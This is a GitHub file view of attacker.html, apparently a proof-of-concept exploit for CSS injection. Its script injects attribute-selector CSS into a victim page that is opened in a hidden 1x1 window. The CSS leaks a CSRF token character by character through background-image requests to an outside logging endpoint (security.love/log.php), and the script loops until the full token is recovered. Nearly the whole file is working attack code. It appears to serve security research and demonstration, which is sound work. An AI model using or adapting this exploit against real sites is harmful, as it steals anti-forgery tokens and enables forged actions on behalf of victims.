-
Notifications
You must be signed in to change notification settings - Fork 49
/
Copy pathattacker.html
93 lines (93 loc) · 8.33 KB
/
attacker.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
<html>
<body onclick="potatoes(0)">click somewhere to begin attack</body>
<script>
navigator.serviceWorker.register('/cssInjection/sw.js', {"scope": "/cssInjection/"});
localStorage.removeItem('csrfToken');
var potatoes = function(count){
var csrfToken = localStorage.getItem("csrfToken");
if(!csrfToken){
csrfToken = '';
}
var css = `#sensitiveForm input[value^='${csrfToken}a'] { background-image: url(https://security.love/log.php/${csrfToken}a); }
#sensitiveForm input[value^='${csrfToken}b'] { background-image: url(https://security.love/log.php/${csrfToken}b); }
#sensitiveForm input[value^='${csrfToken}c'] { background-image: url(https://security.love/log.php/${csrfToken}c); }
#sensitiveForm input[value^='${csrfToken}d'] { background-image: url(https://security.love/log.php/${csrfToken}d); }
#sensitiveForm input[value^='${csrfToken}e'] { background-image: url(https://security.love/log.php/${csrfToken}e); }
#sensitiveForm input[value^='${csrfToken}f'] { background-image: url(https://security.love/log.php/${csrfToken}f); }
#sensitiveForm input[value^='${csrfToken}g'] { background-image: url(https://security.love/log.php/${csrfToken}g); }
#sensitiveForm input[value^='${csrfToken}h'] { background-image: url(https://security.love/log.php/${csrfToken}h); }
#sensitiveForm input[value^='${csrfToken}i'] { background-image: url(https://security.love/log.php/${csrfToken}i); }
#sensitiveForm input[value^='${csrfToken}j'] { background-image: url(https://security.love/log.php/${csrfToken}j); }
#sensitiveForm input[value^='${csrfToken}k'] { background-image: url(https://security.love/log.php/${csrfToken}k); }
#sensitiveForm input[value^='${csrfToken}l'] { background-image: url(https://security.love/log.php/${csrfToken}l); }
#sensitiveForm input[value^='${csrfToken}m'] { background-image: url(https://security.love/log.php/${csrfToken}m); }
#sensitiveForm input[value^='${csrfToken}n'] { background-image: url(https://security.love/log.php/${csrfToken}n); }
#sensitiveForm input[value^='${csrfToken}o'] { background-image: url(https://security.love/log.php/${csrfToken}o); }
#sensitiveForm input[value^='${csrfToken}p'] { background-image: url(https://security.love/log.php/${csrfToken}p); }
#sensitiveForm input[value^='${csrfToken}q'] { background-image: url(https://security.love/log.php/${csrfToken}q); }
#sensitiveForm input[value^='${csrfToken}r'] { background-image: url(https://security.love/log.php/${csrfToken}r); }
#sensitiveForm input[value^='${csrfToken}s'] { background-image: url(https://security.love/log.php/${csrfToken}s); }
#sensitiveForm input[value^='${csrfToken}t'] { background-image: url(https://security.love/log.php/${csrfToken}t); }
#sensitiveForm input[value^='${csrfToken}u'] { background-image: url(https://security.love/log.php/${csrfToken}u); }
#sensitiveForm input[value^='${csrfToken}v'] { background-image: url(https://security.love/log.php/${csrfToken}v); }
#sensitiveForm input[value^='${csrfToken}w'] { background-image: url(https://security.love/log.php/${csrfToken}w); }
#sensitiveForm input[value^='${csrfToken}x'] { background-image: url(https://security.love/log.php/${csrfToken}x); }
#sensitiveForm input[value^='${csrfToken}y'] { background-image: url(https://security.love/log.php/${csrfToken}y); }
#sensitiveForm input[value^='${csrfToken}z'] { background-image: url(https://security.love/log.php/${csrfToken}z); }
#sensitiveForm input[value^='${csrfToken}A'] { background-image: url(https://security.love/log.php/${csrfToken}A); }
#sensitiveForm input[value^='${csrfToken}B'] { background-image: url(https://security.love/log.php/${csrfToken}B); }
#sensitiveForm input[value^='${csrfToken}C'] { background-image: url(https://security.love/log.php/${csrfToken}C); }
#sensitiveForm input[value^='${csrfToken}D'] { background-image: url(https://security.love/log.php/${csrfToken}D); }
#sensitiveForm input[value^='${csrfToken}E'] { background-image: url(https://security.love/log.php/${csrfToken}E); }
#sensitiveForm input[value^='${csrfToken}F'] { background-image: url(https://security.love/log.php/${csrfToken}F); }
#sensitiveForm input[value^='${csrfToken}G'] { background-image: url(https://security.love/log.php/${csrfToken}G); }
#sensitiveForm input[value^='${csrfToken}H'] { background-image: url(https://security.love/log.php/${csrfToken}H); }
#sensitiveForm input[value^='${csrfToken}I'] { background-image: url(https://security.love/log.php/${csrfToken}I); }
#sensitiveForm input[value^='${csrfToken}J'] { background-image: url(https://security.love/log.php/${csrfToken}J); }
#sensitiveForm input[value^='${csrfToken}K'] { background-image: url(https://security.love/log.php/${csrfToken}K); }
#sensitiveForm input[value^='${csrfToken}L'] { background-image: url(https://security.love/log.php/${csrfToken}L); }
#sensitiveForm input[value^='${csrfToken}M'] { background-image: url(https://security.love/log.php/${csrfToken}M); }
#sensitiveForm input[value^='${csrfToken}N'] { background-image: url(https://security.love/log.php/${csrfToken}N); }
#sensitiveForm input[value^='${csrfToken}O'] { background-image: url(https://security.love/log.php/${csrfToken}O); }
#sensitiveForm input[value^='${csrfToken}P'] { background-image: url(https://security.love/log.php/${csrfToken}P); }
#sensitiveForm input[value^='${csrfToken}Q'] { background-image: url(https://security.love/log.php/${csrfToken}Q); }
#sensitiveForm input[value^='${csrfToken}R'] { background-image: url(https://security.love/log.php/${csrfToken}R); }
#sensitiveForm input[value^='${csrfToken}S'] { background-image: url(https://security.love/log.php/${csrfToken}S); }
#sensitiveForm input[value^='${csrfToken}T'] { background-image: url(https://security.love/log.php/${csrfToken}T); }
#sensitiveForm input[value^='${csrfToken}U'] { background-image: url(https://security.love/log.php/${csrfToken}U); }
#sensitiveForm input[value^='${csrfToken}V'] { background-image: url(https://security.love/log.php/${csrfToken}V); }
#sensitiveForm input[value^='${csrfToken}W'] { background-image: url(https://security.love/log.php/${csrfToken}W); }
#sensitiveForm input[value^='${csrfToken}X'] { background-image: url(https://security.love/log.php/${csrfToken}X); }
#sensitiveForm input[value^='${csrfToken}Y'] { background-image: url(https://security.love/log.php/${csrfToken}Y); }
#sensitiveForm input[value^='${csrfToken}Z'] { background-image: url(https://security.love/log.php/${csrfToken}Z); }
#sensitiveForm input[value^='${csrfToken}0'] { background-image: url(https://security.love/log.php/${csrfToken}0); }
#sensitiveForm input[value^='${csrfToken}1'] { background-image: url(https://security.love/log.php/${csrfToken}1); }
#sensitiveForm input[value^='${csrfToken}2'] { background-image: url(https://security.love/log.php/${csrfToken}2); }
#sensitiveForm input[value^='${csrfToken}3'] { background-image: url(https://security.love/log.php/${csrfToken}3); }
#sensitiveForm input[value^='${csrfToken}4'] { background-image: url(https://security.love/log.php/${csrfToken}4); }
#sensitiveForm input[value^='${csrfToken}5'] { background-image: url(https://security.love/log.php/${csrfToken}5); }
#sensitiveForm input[value^='${csrfToken}6'] { background-image: url(https://security.love/log.php/${csrfToken}6); }
#sensitiveForm input[value^='${csrfToken}7'] { background-image: url(https://security.love/log.php/${csrfToken}7); }
#sensitiveForm input[value^='${csrfToken}8'] { background-image: url(https://security.love/log.php/${csrfToken}8); }
#sensitiveForm input[value^='${csrfToken}9'] { background-image: url(https://security.love/log.php/${csrfToken}9); }`
var win2 = window.open('https://security.love/anything', 'f', "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1")
var win2 = window.open(`https://security.love/cssInjection/victim.html?injection=${css}`, 'f', "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1")
win2.blur();
var newCount = count + 1;
if(csrfToken.length == 20){
return null;
}
setTimeout(function(){
potatoes(newCount);
},200);
}
window.addEventListener('storage', function(e) {
if(e.key == "csrfToken"){
document.getElementById("CSRFToken").innerHTML = e.newValue;
}
});
</script>
</br>
The CSRF token is:
<div id="CSRFToken"></div>
</html>